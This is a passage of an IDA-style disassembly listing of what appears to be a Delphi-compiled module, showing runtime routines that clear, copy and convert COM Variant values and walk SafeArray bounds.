mov eax, ds:off_4000DB3C
call sub_4000B030
call sub_400042E4
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000E13D
loc_4000E12D: ; CODE XREF: sub_4000E0EC+4F�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000E136: ; DATA XREF: sub_4000E0EC+8�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000E12D
; ---------------------------------------------------------------------------
loc_4000E13D: ; CODE XREF: sub_4000E0EC+49�j
; DATA XREF: sub_4000E0EC+3C�o
pop ecx
pop ebp
retn
sub_4000E0EC endp
; =============== S U B R O U T I N E =======================================
sub_4000E140 proc near ; CODE XREF: sub_4000E9CC+C6�p
push ebx
mov ebx, eax
mov eax, ebx
call sub_4000E3D8
mov word ptr [ebx], 1
pop ebx
retn
sub_4000E140 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000E154 proc near ; CODE XREF: sub_4000E1E0+123�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
mov ecx, [ebp+arg_0]
add ecx, 0FFFFFD00h
loc_4000E161: ; CODE XREF: sub_4000E154+28�j
mov edx, [ecx+eax*8+4]
add edx, [ecx+eax*8]
mov ebx, [ebp+arg_0]
cmp edx, [ebx+eax*4-100h]
setnle dl
dec eax
test dl, dl
jz short loc_4000E17E
test eax, eax
jge short loc_4000E161
loc_4000E17E: ; CODE XREF: sub_4000E154+24�j
mov eax, edx
pop ebx
pop ebp
retn
sub_4000E154 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000E184 proc near ; CODE XREF: sub_4000E184+4D�p
; sub_4000E1E0+15A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
mov dl, 1
mov ecx, [ebp+arg_0]
inc dword ptr [ecx+eax*4-100h]
mov ecx, [ebp+arg_0]
mov ecx, [ecx+eax*8-2FCh]
mov ebx, ecx
mov esi, [ebp+arg_0]
add ebx, [esi+eax*8-300h]
mov esi, [ebp+arg_0]
cmp ebx, [esi+eax*4-100h]
jg short loc_4000E1D9
test eax, eax
jnz short loc_4000E1BF
xor edx, edx
jmp short loc_4000E1D9
; ---------------------------------------------------------------------------
loc_4000E1BF: ; CODE XREF: sub_4000E184+35�j
mov edx, [ebp+arg_0]
mov edx, [ebp+arg_0]
mov [edx+eax*4-100h], ecx
mov edx, [ebp+arg_0]
push edx
dec eax
call sub_4000E184
pop ecx
mov edx, eax
loc_4000E1D9: ; CODE XREF: sub_4000E184+31�j
; sub_4000E184+39�j
mov eax, edx
pop esi
pop ebx
pop ebp
retn
sub_4000E184 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000E1E0 proc near ; CODE XREF: sub_4000E35C+4B�p
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = byte ptr -300h
var_2FC = byte ptr -2FCh
var_100 = byte ptr -100h
push ebp
mov ebp, esp
add esp, 0FFFFFCE8h
push ebx
push esi
push edi
mov [ebp+var_304], eax
mov eax, [ebp+var_304]
test byte ptr [eax+1], 20h
jnz short loc_4000E208
mov eax, 80070057h
call sub_4000E028
loc_4000E208: ; CODE XREF: sub_4000E1E0+1C�j
mov eax, [ebp+var_304]
movzx eax, word ptr [eax]
mov edx, eax
and dx, 0FFFh
cmp dx, 0Ch
jnz loc_4000E344
mov edx, [ebp+var_304]
test ah, 40h
jz short loc_4000E240
mov eax, [ebp+var_304]
mov eax, [eax+8]
mov eax, [eax]
mov [ebp+var_308], eax
jmp short loc_4000E24F
; ---------------------------------------------------------------------------
loc_4000E240: ; CODE XREF: sub_4000E1E0+4B�j
mov eax, [ebp+var_304]
mov eax, [eax+8]
mov [ebp+var_308], eax
loc_4000E24F: ; CODE XREF: sub_4000E1E0+5E�j
mov eax, [ebp+var_308]
movzx eax, word ptr [eax]
mov [ebp+var_310], eax
mov ebx, [ebp+var_310]
dec ebx
test ebx, ebx
jl short loc_4000E2D4
inc ebx
xor edi, edi
lea esi, [ebp+var_300]
loc_4000E272: ; CODE XREF: sub_4000E1E0+F2�j
mov eax, esi
mov [ebp+var_318], eax
mov eax, [ebp+var_318]
add eax, 4
push eax
lea eax, [edi+1]
push eax
mov eax, [ebp+var_308]
push eax
call sub_4000D248
call sub_4000E028
lea eax, [ebp+var_30C]
push eax
lea eax, [edi+1]
push eax
mov eax, [ebp+var_308]
push eax
call sub_4000D250
call sub_4000E028
mov eax, [ebp+var_318]
mov edx, [ebp+var_30C]
sub edx, [eax+4]
inc edx
mov eax, [ebp+var_318]
mov [eax], edx
inc edi
add esi, 8
dec ebx
jnz short loc_4000E272
loc_4000E2D4: ; CODE XREF: sub_4000E1E0+87�j
mov ebx, [ebp+var_310]
dec ebx
test ebx, ebx
jl short loc_4000E2F9
inc ebx
lea eax, [ebp+var_2FC]
lea edx, [ebp+var_100]
loc_4000E2EC: ; CODE XREF: sub_4000E1E0+117�j
mov ecx, [eax]
mov [edx], ecx
add edx, 4
add eax, 8
dec ebx
jnz short loc_4000E2EC
loc_4000E2F9: ; CODE XREF: sub_4000E1E0+FD�j
; sub_4000E1E0+162�j
push ebp
mov ebx, [ebp+var_310]
dec ebx
mov eax, ebx
call sub_4000E154
pop ecx
test al, al
jz short loc_4000E337
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_100]
push eax
mov eax, [ebp+var_308]
push eax
call sub_4000D258
call sub_4000E028
mov eax, [ebp+var_314]
call sub_4000E3D8
loc_4000E337: ; CODE XREF: sub_4000E1E0+12B�j
push ebp
mov eax, ebx
call sub_4000E184
pop ecx
test al, al
jnz short loc_4000E2F9
loc_4000E344: ; CODE XREF: sub_4000E1E0+3C�j
mov eax, [ebp+var_304]
push eax
call sub_4000CDE0
call sub_4000E028
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000E1E0 endp
; =============== S U B R O U T I N E =======================================
sub_4000E35C proc near ; CODE XREF: sub_4000E3D8:loc_4000E3E5�p
; sub_4000E654+11�p ...
var_C = dword ptr -0Ch
push ebx
push esi
push ecx
mov ebx, eax
movzx esi, word ptr [ebx]
cmp si, 14h
jnb short loc_4000E377
push ebx
call sub_4000CDE0
call sub_4000E028
jmp short loc_4000E3D3
; ---------------------------------------------------------------------------
loc_4000E377: ; CODE XREF: sub_4000E35C+C�j
cmp si, 100h
jnz short loc_4000E38D
mov word ptr [ebx], 0
lea eax, [ebx+8]
call sub_40004884
jmp short loc_4000E3D3
; ---------------------------------------------------------------------------
loc_4000E38D: ; CODE XREF: sub_4000E35C+20�j
cmp si, 101h
jnz short loc_4000E39E
mov eax, ebx
call ds:off_4001F298
jmp short loc_4000E3D3
; ---------------------------------------------------------------------------
loc_4000E39E: ; CODE XREF: sub_4000E35C+36�j
test si, 2000h
jz short loc_4000E3AE
mov eax, ebx
call sub_4000E1E0
jmp short loc_4000E3D3
; ---------------------------------------------------------------------------
loc_4000E3AE: ; CODE XREF: sub_4000E35C+47�j
mov edx, esp
mov eax, esi
call sub_40012D98
test al, al
jz short loc_4000E3C7
mov edx, ebx
mov eax, [esp+0Ch+var_C]
mov ecx, [eax]
call dword ptr [ecx+24h]
jmp short loc_4000E3D3
; ---------------------------------------------------------------------------
loc_4000E3C7: ; CODE XREF: sub_4000E35C+5D�j
push ebx
call sub_4000CDE0
push ebx
call sub_4000CDD8
loc_4000E3D3: ; CODE XREF: sub_4000E35C+19�j
; sub_4000E35C+2F�j ...
pop edx
pop esi
pop ebx
retn
sub_4000E35C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000E3D8 proc near ; CODE XREF: sub_4000E140+5�p
; sub_4000E1E0+152�p ...
test word ptr [eax], 0BFE8h
jnz short loc_4000E3E5
mov word ptr [eax], 0
retn
; ---------------------------------------------------------------------------
loc_4000E3E5: ; CODE XREF: sub_4000E3D8+5�j
call sub_4000E35C
retn
sub_4000E3D8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000E3EC proc near ; CODE XREF: sub_400052FC+9�p
; sub_40012E54+2D�p
; DATA XREF: ...
push eax
call sub_4000E3D8
pop eax
retn
sub_4000E3EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000E3F4 proc near ; CODE XREF: sub_4000E480+14C�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
mov ecx, [ebp+arg_0]
add ecx, 0FFFFFD00h
loc_4000E401: ; CODE XREF: sub_4000E3F4+28�j
mov edx, [ecx+eax*8+4]
add edx, [ecx+eax*8]
mov ebx, [ebp+arg_0]
cmp edx, [ebx+eax*4-100h]
setnle dl
dec eax
test dl, dl
jz short loc_4000E41E
test eax, eax
jge short loc_4000E401
loc_4000E41E: ; CODE XREF: sub_4000E3F4+24�j
mov eax, edx
pop ebx
pop ebp
retn
sub_4000E3F4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000E424 proc near ; CODE XREF: sub_4000E424+4D�p
; sub_4000E480+1A5�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
mov dl, 1
mov ecx, [ebp+arg_0]
inc dword ptr [ecx+eax*4-100h]
mov ecx, [ebp+arg_0]
mov ecx, [ecx+eax*8-2FCh]
mov ebx, ecx
mov esi, [ebp+arg_0]
add ebx, [esi+eax*8-300h]
mov esi, [ebp+arg_0]
cmp ebx, [esi+eax*4-100h]
jg short loc_4000E479
test eax, eax
jnz short loc_4000E45F
xor edx, edx
jmp short loc_4000E479
; ---------------------------------------------------------------------------
loc_4000E45F: ; CODE XREF: sub_4000E424+35�j
mov edx, [ebp+arg_0]
mov edx, [ebp+arg_0]
mov [edx+eax*4-100h], ecx
mov edx, [ebp+arg_0]
push edx
dec eax
call sub_4000E424
pop ecx
mov edx, eax
loc_4000E479: ; CODE XREF: sub_4000E424+31�j
; sub_4000E424+39�j
mov eax, edx
pop esi
pop ebx
pop ebp
retn
sub_4000E424 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000E480 proc near ; CODE XREF: sub_4000E654+75�p
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = byte ptr -300h
var_2FC = byte ptr -2FCh
var_100 = byte ptr -100h
push ebp
mov ebp, esp
add esp, 0FFFFFCE0h
push ebx
push esi
push edi
mov [ebp+var_308], ecx
mov ebx, edx
mov [ebp+var_304], eax
test byte ptr [ebx+1], 20h
jnz short loc_4000E4AA
mov eax, 80070057h
call sub_4000E028
loc_4000E4AA: ; CODE XREF: sub_4000E480+1E�j
movzx eax, word ptr [ebx]
mov edx, eax
and dx, 0FFFh
cmp dx, 0Ch
jnz loc_4000E631
test ah, 40h
jz short loc_4000E4D0
mov eax, [ebx+8]
mov eax, [eax]
mov [ebp+var_314], eax
jmp short loc_4000E4D9
; ---------------------------------------------------------------------------
loc_4000E4D0: ; CODE XREF: sub_4000E480+41�j
mov eax, [ebx+8]
mov [ebp+var_314], eax
loc_4000E4D9: ; CODE XREF: sub_4000E480+4E�j
mov eax, [ebp+var_314]
movzx eax, word ptr [eax]
mov [ebp+var_310], eax
mov ebx, [ebp+var_310]
dec ebx
test ebx, ebx
jl short loc_4000E55E
inc ebx
xor edi, edi
lea esi, [ebp+var_300]
loc_4000E4FC: ; CODE XREF: sub_4000E480+DC�j
mov eax, esi
mov [ebp+var_320], eax
mov eax, [ebp+var_320]
add eax, 4
push eax
lea eax, [edi+1]
push eax
mov eax, [ebp+var_314]
push eax
call sub_4000D248
call sub_4000E028
lea eax, [ebp+var_30C]
push eax
lea eax, [edi+1]
push eax
mov eax, [ebp+var_314]
push eax
call sub_4000D250
call sub_4000E028
mov eax, [ebp+var_320]
mov edx, [ebp+var_30C]
sub edx, [eax+4]
inc edx
mov eax, [ebp+var_320]
mov [eax], edx
inc edi
add esi, 8
dec ebx
jnz short loc_4000E4FC
loc_4000E55E: ; CODE XREF: sub_4000E480+71�j
lea eax, [ebp+var_300]
push eax
mov eax, [ebp+var_310]
push eax
push 0Ch
call sub_4000D240
mov esi, eax
test esi, esi
jnz short loc_4000E57E
call sub_4000DD80
loc_4000E57E: ; CODE XREF: sub_4000E480+F7�j
mov eax, [ebp+var_304]
call sub_4000E3D8
mov eax, [ebp+var_304]
mov word ptr [eax], 200Ch
mov eax, [ebp+var_304]
mov [eax+8], esi
mov ebx, [ebp+var_310]
dec ebx
test ebx, ebx
jl short loc_4000E5C2
inc ebx
lea eax, [ebp+var_2FC]
lea edx, [ebp+var_100]
loc_4000E5B5: ; CODE XREF: sub_4000E480+140�j
mov ecx, [eax]
mov [edx], ecx
add edx, 4
add eax, 8
dec ebx
jnz short loc_4000E5B5
loc_4000E5C2: ; CODE XREF: sub_4000E480+126�j
; sub_4000E480+1AD�j
push ebp
mov ebx, [ebp+var_310]
dec ebx
mov eax, ebx
call sub_4000E3F4
pop ecx
test al, al
jz short loc_4000E622
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_100]
push eax
mov eax, [ebp+var_314]
push eax
call sub_4000D258
call sub_4000E028
lea eax, [ebp+var_31C]
push eax
lea eax, [ebp+var_100]
push eax
push esi
call sub_4000D258
call sub_4000E028
mov eax, [ebp+var_318]
mov edx, eax
mov eax, [ebp+var_31C]
call [ebp+var_308]
loc_4000E622: ; CODE XREF: sub_4000E480+154�j
push ebp
mov eax, ebx
call sub_4000E424
pop ecx
test al, al
jnz short loc_4000E5C2
jmp short loc_4000E643
; ---------------------------------------------------------------------------
loc_4000E631: ; CODE XREF: sub_4000E480+38�j
push ebx
mov eax, [ebp+var_304]
push eax
call sub_4000CDE8
call sub_4000E028
loc_4000E643: ; CODE XREF: sub_4000E480+1AF�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000E480 endp
; ---------------------------------------------------------------------------
align 4
loc_4000E64C: ; DATA XREF: sub_4000E654+6C�o
call sub_4000E700
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000E654 proc near ; CODE XREF: sub_4000E700+3B�p
var_10 = dword ptr -10h
push ebx
push esi
push edi
push ecx
mov esi, edx
mov ebx, eax
test word ptr [ebx], 0BFE8h
jz short loc_4000E66A
mov eax, ebx
call sub_4000E35C
loc_4000E66A: ; CODE XREF: sub_4000E654+D�j
movzx edi, word ptr [esi]
cmp di, 14h
jnb short loc_4000E681
push esi
push ebx
call sub_4000CDE8
call sub_4000E028
jmp short loc_4000E6FA
; ---------------------------------------------------------------------------
loc_4000E681: ; CODE XREF: sub_4000E654+1D�j
cmp di, 100h
jnz short loc_4000E69F
mov word ptr [ebx], 100h
xor eax, eax
mov [ebx+8], eax
lea eax, [ebx+8]
mov edx, [esi+8]
call sub_400048D8
jmp short loc_4000E6FA
; ---------------------------------------------------------------------------
loc_4000E69F: ; CODE XREF: sub_4000E654+32�j
cmp di, 101h
jnz short loc_4000E6B9
mov [ebx], di
mov eax, [esi+8]
mov [ebx+8], eax
mov eax, ebx
call ds:off_4001F2A0
jmp short loc_4000E6FA
; ---------------------------------------------------------------------------
loc_4000E6B9: ; CODE XREF: sub_4000E654+50�j
test di, 2000h
jz short loc_4000E6D0
mov ecx, offset loc_4000E64C
mov edx, esi
mov eax, ebx
call sub_4000E480
jmp short loc_4000E6FA
; ---------------------------------------------------------------------------
loc_4000E6D0: ; CODE XREF: sub_4000E654+6A�j
mov edx, esp
mov eax, edi
call sub_40012D98
test al, al
jz short loc_4000E6EE
push 0
mov ecx, esi
mov edx, ebx
mov eax, [esp+14h+var_10]
mov ebx, [eax]
call dword ptr [ebx+28h]
jmp short loc_4000E6FA
; ---------------------------------------------------------------------------
loc_4000E6EE: ; CODE XREF: sub_4000E654+87�j
push esi
push ebx
call sub_4000CDE8
call sub_4000E028
loc_4000E6FA: ; CODE XREF: sub_4000E654+2B�j
; sub_4000E654+49�j ...
pop edx
pop edi
pop esi
pop ebx
retn
sub_4000E654 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4000E700 proc near ; CODE XREF: sub_4000540C+9�p
; .text:loc_4000E64C�p ...
push ebx
push esi
mov ebx, edx
mov esi, eax
cmp esi, ebx
jz short loc_4000E740
test word ptr [ebx], 0BFE8h
jnz short loc_4000E737
test word ptr [esi], 0BFE8h
jz short loc_4000E71F
mov eax, esi
call sub_4000E35C
loc_4000E71F: ; CODE XREF: sub_4000E700+16�j
mov eax, [ebx]
mov [esi], eax
mov eax, [ebx+4]
mov [esi+4], eax
mov eax, [ebx+8]
mov [esi+8], eax
mov eax, [ebx+0Ch]
mov [esi+0Ch], eax
jmp short loc_4000E740
; ---------------------------------------------------------------------------
loc_4000E737: ; CODE XREF: sub_4000E700+F�j
mov edx, ebx
mov eax, esi
call sub_4000E654
loc_4000E740: ; CODE XREF: sub_4000E700+8�j
; sub_4000E700+35�j
pop esi
pop ebx
retn
sub_4000E700 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000E744 proc near ; CODE XREF: sub_4000E960+1B�p
var_10 = byte ptr -10h
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
push esi
push edi
mov edi, ecx
mov esi, edx
mov ebx, eax
lea eax, [ebp+var_10]
push eax
call sub_4000CDD8
xor eax, eax
push ebp
push offset loc_4000E7A0
push dword ptr fs:[eax]
mov fs:[eax], esp
mov edx, esi
lea eax, [ebp+var_10]
call sub_4000E700
lea eax, [ebp+var_10]
call ds:off_4001F29C
movzx ecx, di
lea edx, [ebp+var_10]
mov eax, ebx
call sub_4000E9CC
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000E7A7
loc_4000E797: ; CODE XREF: sub_4000E744+61�j
lea eax, [ebp+var_10]
call sub_4000E3D8
retn
; ---------------------------------------------------------------------------
loc_4000E7A0: ; DATA XREF: sub_4000E744+1B�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000E797
; ---------------------------------------------------------------------------
loc_4000E7A7: ; CODE XREF: sub_4000E744+5B�j
; DATA XREF: sub_4000E744+4E�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000E744 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000E7B0 proc near ; CODE XREF: sub_4000E9CC+166�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0
push ebx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_4000E7EE
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_4]
call sub_40011DFC
mov eax, ebx
mov edx, [ebp+var_4]
call sub_40012728
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000E7F5
loc_4000E7E5: ; CODE XREF: sub_4000E7B0+43�j
lea eax, [ebp+var_4]
call sub_40005008
retn
; ---------------------------------------------------------------------------
loc_4000E7EE: ; DATA XREF: sub_4000E7B0+B�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000E7E5
; ---------------------------------------------------------------------------
loc_4000E7F5: ; CODE XREF: sub_4000E7B0+3D�j
; DATA XREF: sub_4000E7B0+30�o
pop ebx
pop ecx
pop ebp
retn
sub_4000E7B0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000E7FC proc near ; CODE XREF: sub_4000E9CC+20B�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0
push ebx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_4000E83A
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_4]
call sub_400116DC
mov eax, ebx
mov edx, [ebp+var_4]
call sub_400126FC
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000E841
loc_4000E831: ; CODE XREF: sub_4000E7FC+43�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000E83A: ; DATA XREF: sub_4000E7FC+B�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000E831
; ---------------------------------------------------------------------------
loc_4000E841: ; CODE XREF: sub_4000E7FC+3D�j
; DATA XREF: sub_4000E7FC+30�o
pop ebx
pop ecx
pop ebp
retn
sub_4000E7FC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000E848 proc near ; CODE XREF: sub_4000E9CC+1E6�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0
push ebx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_4000E886
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_4]
call sub_40012494
mov eax, ebx
mov edx, [ebp+var_4]
call sub_4001278C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000E88D
loc_4000E87D: ; CODE XREF: sub_4000E848+43�j
lea eax, [ebp+var_4]
call sub_40006204
retn
; ---------------------------------------------------------------------------
loc_4000E886: ; DATA XREF: sub_4000E848+B�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000E87D
; ---------------------------------------------------------------------------
loc_4000E88D: ; CODE XREF: sub_4000E848+3D�j
; DATA XREF: sub_4000E848+30�o
pop ebx
pop ecx
pop ebp
retn
sub_4000E848 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000E894 proc near ; CODE XREF: sub_4000E9CC+1F1�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0
push ebx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_4000E8D2
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_4]
call sub_400123C8
mov eax, ebx
mov edx, [ebp+var_4]
call sub_40012760
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000E8D9
loc_4000E8C9: ; CODE XREF: sub_4000E894+43�j
lea eax, [ebp+var_4]
call sub_40006204
retn
; ---------------------------------------------------------------------------
loc_4000E8D2: ; DATA XREF: sub_4000E894+B�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000E8C9
; ---------------------------------------------------------------------------
loc_4000E8D9: ; CODE XREF: sub_4000E894+3D�j
; DATA XREF: sub_4000E894+30�o
pop ebx
pop ecx
pop ebp
retn
sub_4000E894 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4000E8E0 proc near ; CODE XREF: sub_4000E960+60�p
push ebx
push esi
push edi
mov esi, ecx
mov ebx, edx
mov edi, eax
movzx eax, word ptr [ebx]
mov edx, eax
and dx, 0FFFh
cmp dx, 14h
jb short loc_4000E926
mov edx, ebx
mov eax, edi
mov ecx, 8
call sub_4000E9CC
push esi
push 0
push 400h
push edi
push edi
mov eax, off_4001B064
mov eax, [eax]
call eax
movzx edx, word ptr [ebx]
mov ecx, esi
call sub_4000E034
jmp short loc_4000E959
; ---------------------------------------------------------------------------
loc_4000E926: ; CODE XREF: sub_4000E8E0+17�j
mov edx, esi
and dx, 0FFFh
cmp dx, 14h
jnb short loc_4000E952
push esi
push 0
push 400h
push ebx
push edi
mov eax, off_4001B064
mov eax, [eax]
call eax
movzx edx, word ptr [ebx]
mov ecx, esi
call sub_4000E034
jmp short loc_4000E959
; ---------------------------------------------------------------------------
loc_4000E952: ; CODE XREF: sub_4000E8E0+51�j
mov edx, esi
call sub_4000DBF4
loc_4000E959: ; CODE XREF: sub_4000E8E0+44�j
; sub_4000E8E0+70�j
pop edi
pop esi
pop ebx
retn
sub_4000E8E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4000E960 proc near ; CODE XREF: sub_4000E9CC+221�p
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
push ecx
mov esi, ecx
mov ebx, edx
mov edi, eax
movzx ebp, word ptr [ebx]
cmp bp, 101h
jnz short loc_4000E982
mov edx, ebx
mov eax, edi
mov ecx, esi
call sub_4000E744
jmp short loc_4000E9C5
; ---------------------------------------------------------------------------
loc_4000E982: ; CODE XREF: sub_4000E960+13�j
mov edx, esp
mov eax, ebp
call sub_40012D98
test al, al
jz short loc_4000E99F
push esi
mov ecx, ebx
mov edx, edi
mov eax, [esp+18h+var_14]
mov ebx, [eax]
call dword ptr [ebx+1Ch]
jmp short loc_4000E9C5
; ---------------------------------------------------------------------------
loc_4000E99F: ; CODE XREF: sub_4000E960+2D�j
mov edx, esp
mov eax, esi
call sub_40012D98
test al, al
jz short loc_4000E9BA
mov ecx, ebx
mov edx, edi
mov eax, [esp+14h+var_14]
mov ebx, [eax]
call dword ptr [ebx+18h]
jmp short loc_4000E9C5
; ---------------------------------------------------------------------------
loc_4000E9BA: ; CODE XREF: sub_4000E960+4A�j
mov edx, ebx
mov eax, edi
mov ecx, esi
call sub_4000E8E0
loc_4000E9C5: ; CODE XREF: sub_4000E960+20�j
; sub_4000E960+3D�j ...
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4000E960 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000E9CC proc near ; CODE XREF: sub_4000E744+41�p
; sub_4000E8E0+22�p ...
var_C = dword ptr -0Ch
push ebx
push esi
mov ebx, edx
mov esi, eax
movzx eax, word ptr [ebx]
movzx edx, ax
cmp ecx, edx
jnz short loc_4000E9E8
mov edx, ebx
mov eax, esi
call sub_4000E700
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4000E9E8: ; CODE XREF: sub_4000E9CC+E�j
cmp ax, 400Ch
jnz short loc_4000E9FF
mov eax, [ebx+8]
mov edx, eax
mov eax, esi
call sub_4000E9CC
jmp loc_4000EBF2
; ---------------------------------------------------------------------------
loc_4000E9FF: ; CODE XREF: sub_4000E9CC+20�j
mov edx, ecx
cmp edx, 14h ; switch 21 cases
ja loc_4000EBC4 ; default
; jumptable 4000EA0A cases 10,12,14,15
jmp ds:off_4000EA11[edx*4] ; switch jump
; ---------------------------------------------------------------------------
off_4000EA11 dd offset loc_4000EA65 ; DATA XREF: sub_4000E9CC+3E�r
dd offset loc_4000EA90 ; jump table for switch statement
dd offset loc_4000EA9C
dd offset loc_4000EAB1
dd offset loc_4000EAC6
dd offset loc_4000EAE0
dd offset loc_4000EAFA
dd offset loc_4000EB14
dd offset loc_4000EB2E
dd offset loc_4000EBAE
dd offset loc_4000EBC4
dd offset loc_4000EB3C
dd offset loc_4000EBC4
dd offset loc_4000EBB9
dd offset loc_4000EBC4
dd offset loc_4000EBC4
dd offset loc_4000EB51
dd offset loc_4000EB66
dd offset loc_4000EB78
dd offset loc_4000EB8A
dd offset loc_4000EB9C
; ---------------------------------------------------------------------------
loc_4000EA65: ; CODE XREF: sub_4000E9CC+3E�j
; DATA XREF: sub_4000E9CC:off_4000EA11�o
cmp word ptr [ebx], 1 ; jumptable 4000EA0A case 0
jnz short loc_4000EA84
cmp byte_4001AA10, 0
jz short loc_4000EA84
xor edx, edx
mov ax, 1
call sub_4000DBF4
jmp loc_4000EBF2
; ---------------------------------------------------------------------------
loc_4000EA84: ; CODE XREF: sub_4000E9CC+9D�j
; sub_4000E9CC+A6�j
mov eax, esi
call sub_4000E3D8
jmp loc_4000EBF2
; ---------------------------------------------------------------------------
loc_4000EA90: ; CODE XREF: sub_4000E9CC+3E�j
; DATA XREF: sub_4000E9CC:off_4000EA11�o
mov eax, esi ; jumptable 4000EA0A case 1
call sub_4000E140
jmp loc_4000EBF2
; ---------------------------------------------------------------------------
loc_4000EA9C: ; CODE XREF: sub_4000E9CC+3E�j
; DATA XREF: sub_4000E9CC:off_4000EA11�o
mov eax, ebx ; jumptable 4000EA0A case 2
call sub_4000F33C
mov edx, eax
mov eax, esi
call sub_400125E0
jmp loc_4000EBF2
; ---------------------------------------------------------------------------
loc_4000EAB1: ; CODE XREF: sub_4000E9CC+3E�j
; DATA XREF: sub_4000E9CC:off_4000EA11�o
mov eax, ebx ; jumptable 4000EA0A case 3
call sub_4000ED90
mov edx, eax
mov eax, esi
call sub_40012540
jmp loc_4000EBF2
; ---------------------------------------------------------------------------
loc_4000EAC6: ; CODE XREF: sub_4000E9CC+3E�j
; DATA XREF: sub_4000E9CC:off_4000EA11�o
mov eax, ebx ; jumptable 4000EA0A case 4
call sub_400106E4
add esp, 0FFFFFFFCh
fstp [esp+0Ch+var_C]
wait
mov eax, esi
call sub_4001262C
jmp loc_4000EBF2
; ---------------------------------------------------------------------------
loc_4000EAE0: ; CODE XREF: sub_4000E9CC+3E�j
; DATA XREF: sub_4000E9CC:off_4000EA11�o
mov eax, ebx ; jumptable 4000EA0A case 5
call sub_4001036C
add esp, 0FFFFFFF8h
fstp qword ptr [esp]
wait
mov eax, esi
call sub_40012650
jmp loc_4000EBF2
; ---------------------------------------------------------------------------
loc_4000EAFA: ; CODE XREF: sub_4000E9CC+3E�j
; DATA XREF: sub_4000E9CC:off_4000EA11�o
mov eax, ebx ; jumptable 4000EA0A case 6
call sub_40011024
